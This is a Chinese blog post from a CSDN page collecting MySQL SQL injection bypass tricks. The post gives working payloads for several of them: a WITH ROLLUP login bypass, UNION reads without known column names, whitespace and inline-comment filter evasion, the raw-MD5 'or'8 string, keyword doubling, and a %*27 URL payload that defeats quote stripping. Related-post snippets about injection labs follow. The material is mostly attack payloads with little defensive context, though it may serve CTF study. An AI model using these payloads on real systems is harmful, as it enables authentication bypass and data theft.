sql一些技巧

最新推荐文章于 2022-11-26 20:14:54 发布
最新推荐文章于 2022-11-26 20:14:54 发布
阅读量354 收藏 1
点赞数
分类专栏: web
最近比较多事,很多地方都停滞不前,想来还是静下心来做些事比较好。
整理一些关于mysql的一些注入技巧,详细的可以到github里面看。里面 有完整的项目。
首先说来最基本的,大小写绕过,字符编码绕过,注释绕过,用||代替or,用&&代替and这些比较普遍的都是基本功,也就是说肯定是每个语句都要用到以上内容,这样可以省下很多时间,
而且,也不会有那么弱的网站对这些都不加以限制,所以这些算是起码的尊重,然而把希望过多的寄存在这里是肯定不够的。
所以我们才有那么多的偏门技巧。本篇就是讲这些较为实用性的大杀器。当然不是我总结出来的,我只是搬运工。


闲话少说,第一个是关于with rollup的用法
一般with rollup前面 搭配group by,group by指定好目标之后,with rollup将会产生一个null的目标,或许你要问这个null的对我们有什么用啊,但其实结合实际
一般的php判断语句是先根据我们的login判断是否在数据库中有这样一列,如果有则进入下一个判断,下一个判断就是判断我们传入的password是否等于数据库中的数据。
想象一下,如果我们group by password with rollup,那么就会产生一个null的password列,然后我们通过limit取出这一行,即可,如果不知道username就用上面那些基础方法如username=‘’Or 1=1,username=0‘ or 1=1(字符与数字比较被视为0),如果limit被过滤了就用编码绕过,十六进制绕过
第二个是不知表名的绕过
这个就是黑科技了,mysql的设计是这样,我们创造了1,2,3,4列,然后用联合查询,如果列数相同就会合并
 select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user;
 select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user)e limit 1 offset 3
select 1,2,3,4 union select * from users;

第三个是空格的绕过
本来这个是不想讲的,毕竟太普遍了,可是由于方法比较多,还是讲一下,首先是字符编码%20, %09, %0a, %0b, %0c, %0d, %a0
其次是注释绕过/**/,注释可以用内联注释,如/*!1234select*//**/* from


第四个是md5的绕过
有时候判断语句不是从数据库中拿出明文进行判断而是用md5散列后的值进行判断,绕过的方法是构造一个经过解析为字符的数字串,只要字符中有我们用于绕过的字符就一样达到效果,所以关键在于构造这样的数字串,原文构造的数字串是
129581926211651571912466741651878684928
                                                                                                                                                    经过md5的内容会是
?T0D??o#??'or'8.N=?
可以看到出现了‘or’8  这样的字符,这个就可以绕过了
 

这样我们会得到username字段和经过MD5散列的表,接下来要做的就是把md5散列的还原,这个网上可能会找的到彩虹表,如果 没有那就--放弃吧。。


第五个是字符连接的操作

一般关键的字符会被过滤

这个时候就是连接的好处了,一般说来直接用单引号就可以连接‘a’'d''m''i''n',然后也可以用字符串连接函数concat,concat_ws,group_concat//需要注意的是concat的函数如果有一个是null就会返回null,是不是又给你带来了新思路hh.

讲到函数还有一个IF(1=1,true,false)

?id=1+UnIoN+SeLecT+1,2,3-- //主要是运用大小写和+,用union判断列的数量

?id=1+UNunionION+SEselectLECT+1,2,3--//过滤


?id=1+un/**/ion+se/**/lect+1,2,3--



<span style="font-family: 微软雅黑, "Microsoft YaHei";">UNION SELECT /*!50000 5,null;%00*//*!40000 4,null-- ,*//*!30000 3,null-- x*/0,null--+<br>SELECT 1/*!41320UNION/*!/*!/*!00000SELECT/*!/*!USER/*!(/*!/*!/*!*/);</span>//额权当姿势越多越好

第五个是登录时候的骚姿势

比如说登录where username =''='',select一个空将返回null,null=null,,ojbk


绕过:

文件的63行开始可以看到,此处将传入的%27和%2527都进行删除处理,也就是还没传入数据库前就已经被该死的程序吃了,但是在67行看到他还吃了*,这样我们就有办法了,我们构造%*27,这样程序吃掉星号*后,%27就会被传入。

payload:

1
http://localhost/injection/user.php?id%3D1%*27%*20and%*20%*271%*27%3D%*271

(id=1' and '1'='1-->id%3D1%*27%*20and%*20%*271%*27%3D%*271)

?id=1+un/**/ion+se/**/lect+1,2,3--

?id=1+un/**/ion+se/**/lect+1,2,3-- 

$id = $_REQUEST[ 'id' ];
$query  = "SELECT * FROM admin WHERE username = $id ";
比如是这样一个查询语句,直接用 '='就行

还有用in绕过过滤等号或者like

比如 select substr('admin',1,5) in('admin')

select * from where id in(1)

还有between

select * from users where username between 'aa' and 'ae';  //admin就会被弹出

十六进制绕过引号

select * from users where username between 0x6161 and 0x6165

?id=1+un/**/ion+se/**/lect+1,2,3--
?id=1+un/**/ion+se/**/lect+1,2,3--
运算符比较绕过,sql中的运算符是弱类型的,除了前面说的字符与数字比较被视为0以外,字符与字符比较也是有有大小之分的,比如可以用
select * from table where username >'a'
select* from table where username >'ad'

zzxsw
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sql使用技巧
李星宇的博客
11-28 423
最近在做报表的统计查询工作,需要用到sql的一些函数,在网上查询后,现在此进行总结: 1  求和函数 SUM SQL中的求和函数SUM( )用于对数据求和,返回选取结果集中所有值的总和 语法如下。 SELECT          SUM(column_name) FROM            table_name 说明:SUM()函数只能作用于数值型数
sql 余数_数据分析-关于sql中的% 符号
weixin_39876450的博客
12-09 1491
很多人在sql碰到 % 符号理解不了。这其实是中了计算机编程的盲区。 我们拿这个表格来说说sql怎么对字段做一个简单的计算。 比如每个人的基本工资都 +10块怎么写? “基本工资 + 10“, 我们能很快反应到这样一个表达式上,我们来深入理解下这个表达式,很显然,这是一个加法,加数是 “基本工资”,被加数是 10,那么具体哪个人的工资被加了10呢? 请看这么一句sql “...
尤里的复仇II 回归【7题】
feiniaotjx的博客
10-23 2763
尤里的复仇II 回归【7题】渗透第一步-信息收集 1渗透第一步-信息收集 2基础环境搭建sqlmap尝鲜题 渗透第一步-信息收集 1 扫目录,但是要从files目录扫,(看了wp才知到) http://oovw8022.ia.aqlab.cn:8022/caidian/files/ 渗透第一步-信息收集 2 这个cms在网上搜了,没有找到,应该是迷惑我们的 看使用说明得知是海熊cms 查询到了cms,就可以在网上找payload了(也可以自己测试),手动无果,再用sqlmap 得到数据库 得表 得字段
CTFhub-SQL注入
Moyv的博客
01-27 3017
CTFhub-SQL注入
绕过正则实现SQL注入
H2223的博客
07-23 1347
sql注入要查询数据必须要有select与from,想要绕过正则表达式就要select后或form前有字符。id=1%27%20order%20by%204--+发现4报错了,改成3后就恢复了,说明有3列。该正则表达式匹配了select后与form前的单词边界,select和from中间的所有字符。%27是'%20是空格--+是为了将后面的代码注释掉。注意1e1会让表格多一列,所以要把3去掉。这样是匹配不上了,但是SQL语法也错了。发现数据出在2,3上了。...
漏洞复现|youdiancms 9.5.0 版本 SQL注入 (CVE-2022-32300)
最新发布
weixin_50791426的博客
11-26 3097
友点企业网站管理系统(简称YouDianCMS系统)集PC站、手机站、微网站、多端小程序(微信、百度、抖音/头条、支付宝、QQ、360小程序)、APP于一体,共用空间,数据同步,是国内开源十站合一优秀企业建站解决方案。通过 /App/Lib/Action/Admin/MailAction.class.php 中的 MailSendID 参数发现 YoudianCMS v9.5.0 包含 SQL 注入漏洞。易受攻击的URL为:/index.php/Admin/mail/viewLog?
md5(string,true)绕过
weixin_53498616的博客
03-19 251
$sql="select * from user where username ='admin' and password ='".md5($password,true)."'"; md5(ffifdyop,true)='or'6\xc9]\x99\xe9!r,\xf9\xedb\x1c 原sql查询语句则变为select * from user where username ='admin' and password =''or'6\xc9]\x99\xe9!r,\xf9\xedb\x1c' 即可绕过.
一些 T-SQL 技巧
09-11
以下是一些实用的T-SQL技巧: 1. **只复制一个表结构,不复制数据** 这个技巧用于在数据库中快速创建一个新的表,其结构与已存在的表相同,但不包含任何数据。你可以使用以下语句: ```sql SELECT TOP 0 * INTO ...
SQL语句技巧
01-19
在数据窗口使用SQL时,尽量把使用的索引放在选择的首列;算法的结构尽量简单;在查询时,不要过多地使用通配符如SELECT * FROM T1语句,要用到几列选择几列如:SELECT COL1,COL2 FROM T1;在可能的情况下尽量限制...
SQL SERVER2000 的一些技巧
12-14
 经常碰到一些忘记表名称的情况,此时只记得个大概,此时可通过查询系统表Sysobjects找到所要的表名,如要查找包含用户的表名,可通过以下SQL语句实现,  Select *  From sysobjects  Where name like '%...
MySql Sql 优化技巧分享
09-09
这个案例为我们提供了一些重要的SQL优化技巧: 1. **使用EXPLAIN分析查询计划**:`EXPLAIN`可以帮助识别查询是否正确利用了索引,以及是否存在全表扫描等问题。 2. **关注数据类型和编码的一致性**:不同的数据编码...
每天一道ctf
whisper921的博客
11-07 717
PHP的字符串解析特性:PHP需要将所有参数转换为有效的变量名,因此在解析查询字符串时,它会做两件事:1.删除空白符 2.将某些字符转换为下划线(包括空格)【当waf不让你过的时候,php却可以让你过】。但php在解析的时候,会先把空格给去掉,这样我们的代码还能正常运行,还上传了非法字符。PHP的字符串解析特性:PHP需要将所有参数转换为有效的变量名,因此在解析查询字符串时,它会做两件事:1.删除空白符 2.将某些字符转换为下划线(包括空格)【当waf不让你过的时候,php却可以让你过】。
sqli-less27过滤注入
青空桑
05-22 273
sqli-less27过滤注入 一、检查网站 127.0.0.1/sqli/less-27/?id=1' 1、可以发现空格被过滤了 空格的部分替换方法:/%0a/、%0a、%09 2、–+也被过滤了 可以选择封装代码:简单来说就是代码结尾加上 ,’ 二、爆数据库名 编写思路:1、过滤部分(空格,–+,大小写)2、查询思路 ?id=0%27%0aUNIon%0aSElect%0a1,database(),%27 三、爆表名 id=0%27%0aUNIon%0aSElect%0a1,(SELEct%0a
sqli-labs ————less -27(union、SELECT、绕过滤)
Fly_鹏程万里
05-19 1887
Less-27从提示界面中我们可以看出这一小节对union、select进行了绕过,那么我们下面来看看源代码吧:SQL语句:$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";过滤机制:function blacklist($id) { $id= preg_replace('/[\/\*]/',"", $id); //strip out /* ...
通过sqli-labs学习sql注入——进阶挑战之less23-28a
热门推荐
giantbranch的专栏
06-10 1万+
本文链接:http://blog.csdn.net/u012763794/article/details/51457142   这次我又来了,Advanced Injections(进阶挑战),就是一些过滤绕过的东西了,基础挑战看这个两篇 最近搞逆向破解去了,http://www.giantbranch.cn/myblog/?p=27,所以这个拖得太久了,今天完工   通过sqli-la...
SQL查询语句练习题27
weixin_34221773的博客
10-15 2947
练习环境为:XP+SQL2000数据库 练习使用的数据库为:学生管理数据库 数据库下载地址为: http://download.csdn.net/download/friendan/4648150 说明 这是我在学习数据库课时,老师给的27道SELECT语句练习题,在写这篇文章时,老师并没有给参考答案, 写这篇文章的目的完全是为了加深我对SQL语句的理解和方便我以后...
sqlilabs教程(21-30)
一个安全研究员
05-28 1949
less-21 此题的注入点还是再uname,不过这次uname别base64编码了,我们来看一下源码 首先来看一下这个危险字符过滤函数: 这个不是我们的重点,但是也是它导致我们在登陆界面不能进行注入。我们的重点放在后台代码对cookie中的uname的操作上: 可以看到,我们页面输出的uname的值实际上就是经过base64编码过后的username的值,如果他这里没有进行输入检...
SQL注入-md5加密参数漏洞(CTF例题)
bin789456的博客
08-29 1550
漏洞成因 php中的md5函数有一个可选参数,如果开发者写查询数据库函数时使用了这个参数,或者在数据存储时是md5后的字符串形式存储,都有可能产生这个漏洞。 利用方法 md5看似是非常强加密措施,但是一旦没有返回我们常见的16进制数,返回了二进制原始输出格式,在浏览器编码的作用下就会编码成为奇怪的字符串(对于二进制一般都会编码)。 我们使用md5碰撞,一旦在这些奇怪的字符串中碰撞出了可以进行SQL注入的特殊字符串,那么就可以越过登录了。 下面是参考资料的英文原版: The trick: Raw MD5 h
CTF——MD5总结
aoao331198的博客
03-15 2658
文章目录1.MD5简介2.弱类型比较的MD5绕过3.强类型比较的MD5绕过4.MD5构造攻击语句 1.MD5简介 MD5是一种常见的加密方式,但准确来说,它只是一种编码方式,它将任意有限长度的字符串通过哈希函数转换为特定长度的字符串。 MD5编码具有单向性,即由明文变密文简单,由密文变明文困难。 破解时只能通过暴力破解即穷举法 所以基于这个特性,MD5可以有效保证信息的完整性,当文件进行一点点的修改,MD5值都会有很大的改变。 MD5生成的密文由2进制表示——128位构成 由16进制表示——32位(大小写
21天掌握SQL核心技巧
SQL总览则会介绍SQL的基本功能,如增删改查(CRUD)操作,并提及一些流行的SQL开发工具,如MySQL Workbench、SQL Server Management Studio等。此外,还会讨论SQL在编程中的应用,例如在Python、Java等语言中与...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值